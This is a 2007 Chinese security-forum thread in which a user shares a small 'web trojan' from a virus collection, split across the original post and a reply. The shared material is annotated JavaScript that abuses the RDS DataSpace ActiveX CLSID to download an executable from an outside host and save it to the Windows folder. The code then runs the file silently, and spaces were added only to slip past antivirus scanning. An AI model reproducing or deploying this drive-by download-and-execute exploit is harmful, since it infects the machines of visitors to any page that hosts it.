首页
社区
课程
招聘
[旧帖] [分享]一个800字节左右的网马 0.00雪花
发表于: 2007-10-9 22:14 3441

[旧帖] [分享]一个800字节左右的网马 0.00雪花

2007-10-9 22:14
3441
无聊的很
帖个我电脑里病毒库中最小的一个网马来玩玩:
<html><head>
<script language =javascript>
'自定义一个函数用来随机产生一个名字
function gn(n)
{var number = Math.random()*n;return '~tmp'+Math.round(number)+'.exe';}
--------------------------------------
try{
dl='H t t p : / / w e b. 2 1 5 7 5 . c o m / 1 1 3 / 1 . e x e ';
'创建一个object元素
var df=document.createElement("object");
'设置其clsid为BD96C556-65A3-11D0-983A-00C04FC29E36
'对应的文件为C:\Program Files\Common Files\System\msadc\msadco.dll
df.s e t A t t r i bute("c l a s s i d ","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
'建立一个对象,使用ajax来下载文件
'这里用了一个简单花招,
var x=df.C r e a t e O b j e c t("M i c r o s o f t . X" + "M" + "L" + "H" + "T" + "T" + "P", "");
'建立一个流对象,并设置数据类型为二进制
v a r S=df.C r e a t e O b j e c t("Adodb.Stream","");
S.type=1;
'以同步方式获取该文件
x. open("G E T", dl,0); x.send();
'调用一个自定义函数生成随机文件
fname1=gn(10000);

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 199
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
第二部分,主要是不被杀软直接杀了
var F=d f.C r e a t e O b j e c t("Scripting.F i l e S y s t e mObject","");
var tmp=F.Get Special Folder(0);
--------------------------------------------------
fname1= F.Build Path (t m p, fname1);
S.Open(); S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close();
var Q=df.CreateObject("Shell.Application","");
Q.Shell Execu te(fname1,"","","open",0); }
catch (i)
{i=1;}
</script></head></html>
为了能上传,一直被杀软查出呢
同时在文件中加了大量的空格.但是应该不影响看清楚吧.
2007-10-9 22:15
0
游客
登录 | 注册 方可回帖
返回
//